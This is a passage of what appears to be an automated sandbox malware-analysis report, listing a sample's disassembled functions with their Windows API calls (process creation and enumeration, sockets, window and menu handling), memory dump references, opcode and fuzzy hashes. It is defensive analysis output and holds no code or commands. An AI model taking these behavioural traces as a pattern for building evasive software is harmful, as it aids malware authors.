                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: DeleteDestroyObjectWindow
                                                                                                                                                                                                                                                                              • String ID: <)|$<)|
                                                                                                                                                                                                                                                                              • API String ID: 2587070983-4059746057
                                                                                                                                                                                                                                                                              • Opcode ID: da2efe2ccd63253259a442f88d5e2c23505027ace504b7e518395092f08d9dac
                                                                                                                                                                                                                                                                              • Instruction ID: 648e0407467e2c34c44f404e6b213a30e05f16dd6bb3b1650c85394edaa4e8f3
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: da2efe2ccd63253259a442f88d5e2c23505027ace504b7e518395092f08d9dac
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 89210B30206A09CFDB58AB15E894F7533E2AB45711F08815DEA03AB362CF3CBC56CB08
                                                                                                                                                                                                                                                                              Function 00786321 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47windowCOMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 00786360
                                                                                                                                                                                                                                                                              • SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 0078638D
                                                                                                                                                                                                                                                                              • DrawMenuBar.USER32(?), ref: 0078639C
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: Menu$InfoItem$Draw
                                                                                                                                                                                                                                                                              • String ID: 0
                                                                                                                                                                                                                                                                              • API String ID: 3227129158-4108050209
                                                                                                                                                                                                                                                                              • Opcode ID: e410f8a46f5edc71ba2bee567865831b52614d16857267ddf4715896a2bf4309
                                                                                                                                                                                                                                                                              • Instruction ID: 424dfbca32c6a7e9f554063e3c8821dbfe21ce49d403f26eaeb7c3b4c353f1b6
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e410f8a46f5edc71ba2bee567865831b52614d16857267ddf4715896a2bf4309
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 05016931540218FFDB21AF15DC88BEE7BB5FB44351F10809AE94AD6190DF788A95EF21
                                                                                                                                                                                                                                                                              Function 0078823D Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 41windowCOMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • GetForegroundWindow.USER32(?,007C28E0,0078AD55,000000FC,?,00000000,00000000,?), ref: 0078823F
                                                                                                                                                                                                                                                                              • GetFocus.USER32 ref: 00788247
                                                                                                                                                                                                                                                                                • Part of subcall function 006F249F: GetWindowLongW.USER32(00000000,000000EB), ref: 006F24B0
                                                                                                                                                                                                                                                                                • Part of subcall function 006F2234: GetWindowLongW.USER32(?,000000EB), ref: 006F2242
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(?,000000B0,000001BC,000001C0), ref: 007882B4
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: Window$Long$FocusForegroundMessageSend
                                                                                                                                                                                                                                                                              • String ID: (|
                                                                                                                                                                                                                                                                              • API String ID: 3601265619-3772712737
                                                                                                                                                                                                                                                                              • Opcode ID: 5d7c7a5e0a9f42c62c5527e4b7b4e8e0a4a861e28acd210aff52fa7f1340c8db
                                                                                                                                                                                                                                                                              • Instruction ID: 9661a10d4d67a0e87316a7c93ee37a62471fec39b01bb809b7c0c8199e46f69b
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5d7c7a5e0a9f42c62c5527e4b7b4e8e0a4a861e28acd210aff52fa7f1340c8db
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 82015E31242900CFC3659B68D958A6933E6FB89320F6442ADE516873A1DF396C07CB41
                                                                                                                                                                                                                                                                              Function 00788526 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 41COMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • DestroyAcceleratorTable.USER32(?), ref: 00788576
                                                                                                                                                                                                                                                                              • CreateAcceleratorTableW.USER32(00000000,?,?,?,0076BE96,00000000,00000000,?,00000001,00000002), ref: 0078858C
                                                                                                                                                                                                                                                                              • GetForegroundWindow.USER32(?,0076BE96,00000000,00000000,?,00000001,00000002), ref: 00788595
                                                                                                                                                                                                                                                                                • Part of subcall function 006F249F: GetWindowLongW.USER32(00000000,000000EB), ref: 006F24B0
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: AcceleratorTableWindow$CreateDestroyForegroundLong
                                                                                                                                                                                                                                                                              • String ID: (|
                                                                                                                                                                                                                                                                              • API String ID: 986409557-3772712737
                                                                                                                                                                                                                                                                              • Opcode ID: 7b0605426ed96735e0f181653df6a6e99bc5e46862fb796a4e7b156f68db7eb4
                                                                                                                                                                                                                                                                              • Instruction ID: cc60e1babeb4ac075943089832ee490eca0d45b1edf5f4e7d7ba8082a1961040
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7b0605426ed96735e0f181653df6a6e99bc5e46862fb796a4e7b156f68db7eb4
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C1012931641304DFCB64AF69DC88A6537A1FB04321F64852DE511962B1DB38A9A1CF45
                                                                                                                                                                                                                                                                              Function 00788BCD Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 40processCOMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,007C4038,007C407C), ref: 00788C1A
                                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32 ref: 00788C2C
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: CloseCreateHandleProcess
                                                                                                                                                                                                                                                                              • String ID: 8@|$|@|
                                                                                                                                                                                                                                                                              • API String ID: 3712363035-4008437926
                                                                                                                                                                                                                                                                              • Opcode ID: 5484868fae4a35a7d8e1aa8cc2a78fd8c4922d4b4cb171d5fb09ce4bd42f89c0
                                                                                                                                                                                                                                                                              • Instruction ID: e29828ac0b4adbc5d73a14288586cfb80e2a45e44f50c871f13213e527aefeff
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5484868fae4a35a7d8e1aa8cc2a78fd8c4922d4b4cb171d5fb09ce4bd42f89c0
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: AEF03AB26C1204BAE7106B64AC59FB73B5CFB04350F0180A9BB08D61E2D66D8C9083BD
                                                                                                                                                                                                                                                                              Function 0075096F Relevance: 6.3, APIs: 4, Instructions: 322COMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                                              • Opcode ID: 100c2d0488cfc2e35530a4044015e1c6f07b33b04acb372568b41bae75334906
                                                                                                                                                                                                                                                                              • Instruction ID: 4d3f308aa3b03400bd40ec52db96b2679c468f5cc5463d10c26a0f65197d8ebe
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 100c2d0488cfc2e35530a4044015e1c6f07b33b04acb372568b41bae75334906
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6BC18A75A0020AEFCB14CFA4C894EAEB7B5FF48715F208598E805EB251D774EE85CB90
                                                                                                                                                                                                                                                                              Function 007241F3 Relevance: 6.3, APIs: 4, Instructions: 305COMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: __alldvrm$_strrchr
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 1036877536-0
                                                                                                                                                                                                                                                                              • Opcode ID: 65ac5c1fffd7beff7dffafb7e38bd52ffe3f80321006b0a9665303c455145bc9
                                                                                                                                                                                                                                                                              • Instruction ID: ce7b917c938f89e051a35a8a220accc582623d989fa6564e8a6dc5029cddd584
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 65ac5c1fffd7beff7dffafb7e38bd52ffe3f80321006b0a9665303c455145bc9
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 25A15872A003A6DFEB21DF18E8917AEBBE4EF15310F2441ADE5959B282D23C9D41C750
                                                                                                                                                                                                                                                                              Function 00750D26 Relevance: 6.2, APIs: 4, Instructions: 230COMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00790BD4,?), ref: 00750EE0
                                                                                                                                                                                                                                                                              • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00790BD4,?), ref: 00750EF8
                                                                                                                                                                                                                                                                              • CLSIDFromProgID.OLE32(?,?,00000000,0078DCE0,000000FF,?,00000000,00000800,00000000,?,00790BD4,?), ref: 00750F1D
                                                                                                                                                                                                                                                                              • _memcmp.LIBVCRUNTIME ref: 00750F3E
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: FromProg$FreeTask_memcmp
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 314563124-0
                                                                                                                                                                                                                                                                              • Opcode ID: 3f8d97223b45119dd97344aee79d1cf995466dea98f5c5f258261e186e658503
                                                                                                                                                                                                                                                                              • Instruction ID: 3b4eabb954c6d808f954e6a676230ddc8f26171803654aaffc202ed513e7bc87
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3f8d97223b45119dd97344aee79d1cf995466dea98f5c5f258261e186e658503
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2381FD75A00109EFCB14DF94C984DEEB7B9FF89315F204558F906AB250DB75AE09CBA0
                                                                                                                                                                                                                                                                              Function 0077B0DC Relevance: 6.2, APIs: 4, Instructions: 175processCOMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • CreateToolhelp32Snapshot.KERNEL32 ref: 0077B10C
                                                                                                                                                                                                                                                                              • Process32FirstW.KERNEL32(00000000,?), ref: 0077B11A
                                                                                                                                                                                                                                                                                • Part of subcall function 006FB329: _wcslen.LIBCMT ref: 006FB333
                                                                                                                                                                                                                                                                              • Process32NextW.KERNEL32(00000000,?), ref: 0077B1FC
                                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0077B20B
                                                                                                                                                                                                                                                                                • Part of subcall function 0070E36B: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,00734D73,?), ref: 0070E395
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 1991900642-0
                                                                                                                                                                                                                                                                              • Opcode ID: 6af8da45e5d38ae049da1cdf8d0a4fb342d13694423607fcc03884a87b8edea1
                                                                                                                                                                                                                                                                              • Instruction ID: b7f55fe315fa6dca84e202627f9027289e34ef93239fa777cf7499377811d03e
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6af8da45e5d38ae049da1cdf8d0a4fb342d13694423607fcc03884a87b8edea1
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 78517B71908304AFD750EF24C886A6BBBE8FF89754F40891DF68997291EB74D904CB92
                                                                                                                                                                                                                                                                              Function 00731711 Relevance: 6.2, APIs: 4, Instructions: 152COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: _free
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 269201875-0
                                                                                                                                                                                                                                                                              • Opcode ID: 2286a83196e72e05397c4ba40f7c2937588e5a9a0f281b5b4d2a28e91bf28939
                                                                                                                                                                                                                                                                              • Instruction ID: 8d178cc6681fe20c618fd5ec3c65b257de70d35322e18b7c422b3836efa6b5ce
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2286a83196e72e05397c4ba40f7c2937588e5a9a0f281b5b4d2a28e91bf28939
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B9412931A00110EBFB217ABD9C4AAFE3BA4EF41370F584635F818D62D3DA3D4C418666
                                                                                                                                                                                                                                                                              Function 00772533 Relevance: 6.1, APIs: 4, Instructions: 138networkCOMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • socket.WSOCK32(00000002,00000002,00000011), ref: 0077255A
                                                                                                                                                                                                                                                                              • WSAGetLastError.WSOCK32 ref: 00772568
                                                                                                                                                                                                                                                                              • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 007725E7
                                                                                                                                                                                                                                                                              • WSAGetLastError.WSOCK32 ref: 007725F1
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: ErrorLast$socket
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 1881357543-0
                                                                                                                                                                                                                                                                              • Opcode ID: fe251fde1b477c9c479e1b988d95caab266d695c1b4d790a45302e416727a9a2
                                                                                                                                                                                                                                                                              • Instruction ID: 9d69958ba7af429a8f6dbb452e928245ce4905c403e47114af77f13ebe7ec95a
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: fe251fde1b477c9c479e1b988d95caab266d695c1b4d790a45302e416727a9a2
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B641D634A40200AFE720AF24C886F2677D5AB04758F94C48CF6198F2D3D776ED42CB90
                                                                                                                                                                                                                                                                              Function 00786CB0 Relevance: 6.1, APIs: 4, Instructions: 138COMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • GetWindowRect.USER32(?,?), ref: 00786D1A
                                                                                                                                                                                                                                                                              • ScreenToClient.USER32(?,?), ref: 00786D4D
                                                                                                                                                                                                                                                                              • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 00786DBA
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: Window$ClientMoveRectScreen
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 3880355969-0
                                                                                                                                                                                                                                                                              • Opcode ID: b1b2545ffe39e22b5418eed66238b49d549f223c475dbee542817d8b5f69592b
                                                                                                                                                                                                                                                                              • Instruction ID: f73e8e64fc043cf61a26d5b7f7ec57c394636470fb74f2e77fb94434446f0703
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b1b2545ffe39e22b5418eed66238b49d549f223c475dbee542817d8b5f69592b
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D7512B74A40209EFCF24EF64D984AAE7BB6FF44360F208159F9159B291D774EE81CB60
                                                                                                                                                                                                                                                                              Function 0072B79F Relevance: 6.1, APIs: 4, Instructions: 133COMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                                              • Opcode ID: 973dad4a774b2f6aa354b801a49acf744da6b59a3a005cb71651b722364bc564
                                                                                                                                                                                                                                                                              • Instruction ID: e512a3c33b30e63cc64482a7094ca08bc93a983d9ed7a6f3bd0bc6ae536f026d
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 973dad4a774b2f6aa354b801a49acf744da6b59a3a005cb71651b722364bc564
